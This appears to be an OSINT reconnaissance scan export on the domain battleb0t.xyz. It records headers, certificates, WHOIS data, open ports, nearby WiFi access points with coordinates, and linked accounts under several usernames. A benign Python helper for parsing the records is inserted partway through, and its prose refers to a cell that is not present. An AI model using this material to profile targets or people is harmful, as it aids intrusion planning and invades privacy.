| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 10 | 0 | 3 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU |
| 2023-05-12 02:55:22 | Linked URL - Internal | No | Google | 0 | 0 | 1 | 0 | None | https://battleb0t.xyz/ | battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom6E1FC8 (Net ID: 00:0C:F6:6E:1F:C8) | 50.8897, 6.0563 |
| 2023-05-12 02:44:11 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | github.com | battleb0t.xyz |
| 2023-05-12 03:23:41 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | ArtBreeder (Category: art)
https://www.artbreeder.com/baptiste.vauthey | baptiste.vauthey |
| 2023-05-12 02:45:32 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'SC', u'country_tld': u'.us', u'ip': u'34.148.97.127', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'North Charleston', u'network': u'34.148.0.0/16', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 32.853, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'GOOGLE-CLOUD-PLATFORM', u'postal': u'29405', u'asn': u'AS396982', u'country': u'US', u'region': u'South Carolina', u'longitude': -79.9876, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 34.148.97.127 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.7): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HSTS | funny.battleb0t.xyz |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c594d129a872998-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Instagram (Category: social)
https://instagram.com/Altpapier | Altpapier |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Baur (Net ID: 00:0C:F6:67:34:C4) | 50.8897, 6.0563 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.215): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:23:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.1:8443 | 188.114.96.0/24 |
| 2023-05-12 03:09:49 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 80.170.74.34.bc.googleusercontent.com | 34.74.170.80 |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.107 | 35.229.48.116 |
| 2023-05-12 02:50:50 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [104.21.6.166]
https://www.virustotal.com/en/ip-address/104.21.6.166/information/ | 104.21.6.166 |
| 2023-05-12 02:56:56 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | portainer.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d5:98:ae:2a:84:a2:19:ac:80:9a:6c:74:76:20:f8:3f:d8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:01 2022 GMT
Not After : Feb 15 09:44:00 2023 GMT
Subject: CN=portainer.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:b5:e1:c5:d7:75:db:34:03:18:a1:ee:7b:4b:
ea:8e:e7:69:4e:39:85:68:38:67:3d:c1:9a:8b:f3:
bd:cf:17:bb:68:6a:65:cf:4a:a8:76:23:7a:4f:20:
df:84:d1:79:b9:6a:69:1e:44:79:b1:f5:77:a0:d1:
57:7d:30:22:17:73:4d:12:ae:da:6f:17:2f:cc:59:
fc:28:b2:56:e2:d1:04:1e:a5:af:0c:cc:00:03:c9:
be:8b:f2:e1:2a:f3:ee:60:20:15:0b:48:ba:bd:47:
ee:af:b8:94:3e:d3:00:b1:a7:9d:eb:e0:5f:7e:6f:
9e:2f:c5:a5:c8:f8:87:92:71:43:69:60:10:5d:de:
5f:ef:16:13:44:c8:38:e1:ab:bf:d4:ba:c9:63:0e:
71:cd:82:05:39:b6:2b:c7:09:a0:3f:7a:0f:d1:b5:
8c:31:e1:64:fb:3e:7d:9c:f0:15:49:3c:98:f1:98:
8a:de:cb:a1:c8:6f:57:47:ea:69:8f:65:04:e8:bd:
1e:d7:20:58:d9:de:ea:65:82:25:f4:8a:20:52:90:
c5:c4:e3:bf:c3:af:cc:ca:46:be:71:d3:24:c0:85:
69:56:27:39:94:2d:43:65:9d:2f:bb:4d:62:7e:14:
0c:45:91:3c:ec:e1:a2:ae:81:70:73:3d:8e:8c:ef:
5a:48:f8:f8:b4:3f:a5:4e:ca:0b:38:80:5d:df:42:
eb:06:32:21:0b:67:44:bf:df:2c:ae:bd:f6:68:1d:
b6:39:c5:d8:57:bc:5e:76:f0:ee:ab:21:2d:35:69:
74:8a:c4:88:bd:d0:3d:91:05:d0:dd:4e:54:8e:e9:
94:fd:a6:9c:7c:35:94:f3:2c:a0:e6:0f:6f:ec:d7:
06:e0:96:b5:94:ae:64:fd:f9:52:45:cc:c0:54:2c:
ae:a7:51:2d:fb:3c:d9:4c:eb:d6:b7:fe:7c:8d:68:
1d:87:d4:dc:09:38:2e:ee:0d:49:32:4c:2b:08:20:
ff:a0:95:02:0a:01:3f:99:e9:bb:d2:97:db:d5:f5:
7d:97:14:d0:18:c5:3f:cf:31:7b:a7:9c:bf:9d:b3:
23:66:83:9e:eb:d9:48:01:38:6c:db:2f:7b:2d:82:
d4:36:d7:86:9f:0b:de:ef:ab:c4:7c:aa:36:24:d0:
9f:9a:47:7a:a3:aa:26:bd:ef:52:90:60:1c:7e:d9:
0d:dc:f1:5b:cb:c0:7c:8b:f6:64:bf:41:76:8c:ba:
34:64:15:cb:49:b9:40:f8:78:ff:c5:eb:99:a1:af:
b3:7a:cb:c9:d0:b9:1b:1a:3d:ef:4c:68:86:22:46:
99:75:81:d3:cf:5c:90:1a:2f:01:4f:59:01:34:82:
5c:f7:3f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6D:D8:A8:24:70:8B:8F:0C:4D:0C:6C:1A:D9:1A:9A:75:25:E5:1A:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:portainer.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
7b:33:f1:a4:1d:68:11:39:8e:a5:85:a1:57:3a:ca:d6:76:61:
f8:90:77:ab:e2:9c:59:92:45:d9:89:9e:df:9d:5a:f5:8b:7f:
42:54:73:71:1b:ca:7f:2b:96:f8:66:7c:34:c0:4e:2c:4c:9f:
09:95:c5:44:f7:32:57:ad:ef:51:b6:f3:c5:42:de:f8:f8:40:
ba:f2:1b:dc:8d:ef:98:6c:11:da:4c:0a:34:59:21:6e:c6:73:
f1:61:40:2e:f2:b9:f0:51:47:9f:99:b8:d9:0d:49:7a:ef:27:
e4:14:a2:91:4e:c8:ff:77:ed:d8:2a:08:39:4d:00:8c:b1:9e:
3f:a5:b7:7f:34:b6:23:7c:d8:2c:35:c9:7e:78:84:b5:e7:43:
e6:b4:77:80:74:b2:b6:5f:6a:41:e0:e4:7d:ef:7c:67:27:96:
b1:ac:62:09:93:da:ed:11:2b:48:d5:94:7a:0b:9e:f1:11:21:
dc:75:a1:c4:c6:6d:aa:ec:0e:65:68:9b:cf:38:b0:39:f3:a1:
13:80:f1:21:f3:20:a7:54:f6:76:9a:e6:a2:d4:20:0b:0a:f3:
8c:94:c2:94:30:fd:f1:9c:4a:e9:36:b3:ce:d7:bf:1f:5a:c8:
68:2f:89:7a:a2:d2:eb:17:ad:ce:de:30:8f:4f:0e:24:60:d8:
dd:33:cb:70
|
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | Domain Name: netlify.app
Registry Domain ID: 2CB5C0CD0-APP
Registrar WHOIS Server: whois.nic.google
Registrar URL: http://www.name.com
Updated Date: 2023-04-11T15:58:16Z
Creation Date: 2018-05-08T22:48:05Z
Registry Expiry Date: 2024-05-08T22:48:05Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Netlify
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: CA
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.p01.nsone.net
Name Server: dns2.p01.nsone.net
Name Server: dns3.p01.nsone.net
Name Server: dns4.p01.nsone.net
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Please query the WHOIS server of the owning registrar identified in this
output for information on how to contact the Registrant, Admin, or Tech
contact of the queried domain name.
WHOIS information is provided by Charleston Road Registry Inc. (CRR) solely
for query-based, informational purposes. By querying our WHOIS database, you
are agreeing to comply with these terms
(https://www.registry.google/about/whois-disclaimer.html) and acknowledge
that your information will be used in accordance with CRR's Privacy Policy
(https://www.registry.google/about/privacy.html), so please read those
documents carefully. Any information provided is "as is" without any
guarantee of accuracy. You may not use such information to (a) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations; (b) enable high volume, automated,
electronic processes that access the systems of CRR or any ICANN-Accredited
Registrar, except as reasonably necessary to register domain names or modify
existing registrations; or (c) engage in or support unlawful behavior. CRR
reserves the right to restrict or deny your access to the Whois database,
and may modify these terms at any time.
|
| 2023-05-12 03:41:52 | Open TCP Port | No | Censys | 0 | 1 | 3 | 0 | None | 45.131.109.53:3389 | 45.131.109.53 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.18): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:AA:8C:74:82) | 41.8781, -87.6298 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ENHLG (Net ID: 00:01:36:5B:37:00) | 37.7813933,-122.3918002 |
| 2023-05-12 03:00:52 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.80): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:16:23 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.96.1', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} | 188.114.96.1 |
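The "Raw Data from RIRs" cells in this export are stored as a Python 2 repr (u'' strings, True/False) rather than JSON, so json.loads rejects them as-is. The helper below is an added example, not part of the SpiderFoot export or of the ipapi.co response; its input is the record from the 188.114.96.1 row above, copied from the page, and the SHARED_EDGE_ASNS list is an assumption made for the example. The point it makes: 188.114.96.0/22 is Cloudflare (AS13335) anycast space, so the Amsterdam geolocation here, and the "Blacklisted IP on Same Subnet" hits for 188.114.96.0/24 and 188.114.97.0/24 elsewhere in the table, describe shared edge infrastructure rather than the target's origin. The same conversion applies to the Hybrid Analysis cell further down, except that that cell is cut off in the export and will not parse whole.

```python
"""Normalise the 'Raw Data from RIRs' cells that this export stores as a
Python 2 repr (u'...' strings, True/False/None) rather than JSON, and pull
out the attribution fields that actually matter."""
import ast
import ipaddress
import json

# Cell content of the ipapi.co row for 188.114.96.1 above, copied from the page.
RAW_IPAPI_ROW = """{u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.96.1', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'}"""

# Anycast CDN edge networks shared by many unrelated tenants. Geolocation of
# these addresses describes the point of presence nearest the lookup service,
# not the origin, and neighbour-based blacklists on them are noise.
# This short list is an assumption for the example, not data from the scan.
SHARED_EDGE_ASNS = {"AS13335": "Cloudflare", "AS54113": "Fastly"}


def parse_py_repr(raw: str) -> dict:
    """Accept JSON or a Python-literal repr. ast.literal_eval only evaluates
    literals, so it is safe on untrusted scanner output (unlike eval)."""
    try:
        obj = json.loads(raw)
    except json.JSONDecodeError:
        obj = ast.literal_eval(raw)
    if not isinstance(obj, dict):
        raise ValueError("expected a dict-shaped RIR record")
    return obj


def summarize(rec: dict) -> dict:
    """Reduce a record to the fields that matter for attribution and flag
    whether its geolocation can be trusted at all."""
    ip = ipaddress.ip_address(rec["ip"])
    net = ipaddress.ip_network(rec["network"], strict=False)
    asn = rec.get("asn", "")
    return {
        "ip": str(ip),
        "network": str(net),
        "ip_in_network": ip in net,          # sanity check on the lookup itself
        "asn": asn,
        "org": rec.get("org", ""),
        "shared_edge": SHARED_EDGE_ASNS.get(asn),
        "geo_usable": asn not in SHARED_EDGE_ASNS,
        "city": rec.get("city"),
    }


def to_json(raw: str) -> str:
    """Re-serialise a repr cell as JSON so downstream tooling can consume it."""
    return json.dumps(parse_py_repr(raw), sort_keys=True)


if __name__ == "__main__":
    print(json.dumps(summarize(parse_py_repr(RAW_IPAPI_ROW)), indent=2))
```

Run it on any "Raw Data from RIRs" cell; a record whose ASN is in the shared-edge list should have its city, coordinates and subnet-neighbour findings discounted rather than carried into a report as facts about the target.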
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT2fMx5Ja (Net ID: E0:22:04:69:C4:4A) | 37.751, -97.822 |
| 2023-05-12 03:32:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.11:8080 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:18:F8:E5:8F:A8) | 32.8608, -79.9746 |
| 2023-05-12 02:53:56 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["8F4E:438C:28D6A76:39C4C57:645DA4A1"], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-klot8100090-CHI"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683858593.452046,VS0,VE24"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8d-239b\""], "X_Fastly_Request_Id": ["bf30db8298ebcbd37ba35a7187f0fd669e8117db"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8001::153 |
| 2023-05-12 03:01:10 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.124): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | MCUUID (Minecraft) (Category: gaming)
https://mcuuid.net/?q=Altpapier | Altpapier |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | rtsmith134 (Net ID: 00:01:24:F0:37:68) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:53:04 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | fluid.battleb0t.xyz |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.197): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:3E:F2:BC) | 40.2024, 29.0398 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | PLXDevices (Net ID: 00:06:66:30:03:AC) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-ray: 7c5f8c59d97743e3-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:57:22 | Co-Hosted Site | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | sni.cloudflaressl.com | battleb0t.xyz |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | memrise (Category: hobby)
https://app.memrise.com/user/ayhu/ | ayhu |
| 2023-05-12 03:32:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.3:8080 | 188.114.97.0/24 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 2 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60363a5a178c')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="49Idt7TVQjX1pBvRrI.6aeE3rlIvevuAC7b5vTR0YGE-1683860053-0-AY2CmFGtsZtnLcnB3KaVSnayJydAFpMBwiHerGE4rgR3JSYE2THMUlIcqEG1Ue8w91NqXc1_LHx6GFVlXiEAESIr_nGQ5go_qchKEn3Zd9LGEn7sjdr5MGswrCl99ImQfUgu6KdI_WivVs4bd90GT85W3eqgKUj3u0FUHAfgMsZls8XQdBKgHld4LM0wMOiwkj4Zv_skkfuoeKho_dzt4CkE8TkBrPt00M8eIbThaadGvVY0ZXacJCnFJrMWgEfguZYQYUBYVuQPCo4vsaoC9FJto9c6wa1TZj17T__0EGfb7iIg-Fe40vQL0GKl1g68OrtJF7bhLP5OSmmfJD-JBdOEbpA042KC5D5FyslCSfE7VL_rZtwmaMGkKhFs9rNjkGtzvRpQkvZRYfyEeWln9xUv2AoyKgo_1wsNTA_ve-XNzmkKtYDqJDpKDva2W3pJ_3486t1fxBPGklTfmIx9NlGkUpFz141VY7sqmJxOdPADiSQrKzSt-fovaHrioNcpkC_a9kgYIR8XX9ZtGjpkxl_IolwlzL--CdPxkW0zMtKJ-ob6rp2YNV1BUrgbluir9hqadqgAXGwt_gZWou60RMf3UaSZgv32iteEpLg55lWyX9LlrUvEr69WGY_mW2VC6sS9celjhcxiPOQLUkE6KOI9dyhMsK_hvZhX7dDzQsZTH4jAvHUf9CQD2LuSWPV3IPZysl2v0-TSOr10-QdcM27ziun4ot0DvTudFu8lZubQ6YgSwrTQ0wlCjvSq6gwpTOqihrt99F-QaEJWo9sY1ul0FhgMesYynTr4n3snoOM31ZGsLMXWKlkFnwUy1gZdrnW6lGoCkCZNGJjETZCrO0I1-blCIjRzIo6n3EQP7MT5qxAPdJn4-285kyLwMrAm9nW0Fi-T32j1LOogUb6WyPmjQkstsoGMIPyZHJWu0K53P0Hp3SPyKBDSdN4PFWJ5HhYglCXZ4frWkFfTdPf1mz5N5hMALh4FLKDLHit2KyOqpzy4LGkpslmmSQV9AzBKoRj1GEO_-FcLHTt9Y_hlt3lZHsDBr1qsBzb2CCXFE8o-Cu7OAduNH_CAS2sCSdUmt1KpWrCRaId6zphb5lrgZKo6-UG1p8eW6scfDanDgxE_uwAeJyjUHxAEdnSiE1KEwJ9jCVqAgp9dVVHeTI4rz44dE3vG-URKonk4rAmwzUrgRitO_d4uGYtEZ4E7qxVnEHPqSPPlSj7XCukbKVCLBJxrlSwrndqrFnPWXTVbd4VDbjuKYax1pPS7eYUGT_UeCCeppPOHUje3Psa1ejipoF94FUlnfTdlsYbhNQHOKrCLTleuO-lGh4FkydbCaYMbMeAAZyBt0xtAetQyd7ldNHUNuC2Nofi66SO1NL6dsaVskjPRRnE6ZvIpqMSXLJLgGQGDosioOi4TetnoLMpoodURiB_nIbRVwEcdjLeqlr_heAlhB9DjGpMi7U2THwVCr2WtE0eC7jgUi7EvjeNq152r1Qqg397yfToV5_wu059jWgynPgNUwC4lcn5G-MBIXveyQXm1Kc3wCLL9zpH8MAPvrg7a-sB2jNRF-Z6W26XqIgEKRCWc-